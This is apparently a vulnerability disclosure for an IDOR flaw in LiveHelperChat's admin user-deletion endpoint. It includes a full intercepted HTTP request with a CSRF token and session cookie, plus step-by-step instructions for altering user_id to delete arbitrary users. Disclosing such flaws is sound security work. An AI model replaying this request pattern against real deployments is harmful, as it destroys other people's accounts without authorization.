LiveHelperChat is vulnerable to Insecure Direct Object Reference / IDOR vulnerability. The system’s authorization functionality does not prevent one user from deleting another user by modifying the user_id
identifying the user.
Each user has a user_id
(1,2,3,…). A malicious authorized user can delete any other user by changing the value of user_id
in the GET request of deleting user.
HTTP request
GET /site_admin/user/delete/3/(csfr)/6252584dffdb5fd120f461a3f36d3bf5 HTTP/1.1
Host: demo.livehelperchat.com
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://demo.livehelperchat.com/site_admin/user/userlist
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=n7c0ok7vbicornv5g10fc38ein
1.Go to the user list (https://demo.livehelperchat.com/site_admin/user/userlist
)
2.Click on the delete
button of any user (for example: the user with user_id=3
)
3.Intercept the request, now it looks like /site_admin/user/delete/3/(csfr)/<csrf_value>
4.Then change the value of user_id
in the request from 3 to another (1,2,4,…) whether that user_id
exists in the user list.
5.Forward the requests, now the user with new user_id
will be deleted.
This vulnerability is capable of deleting any user in the user list.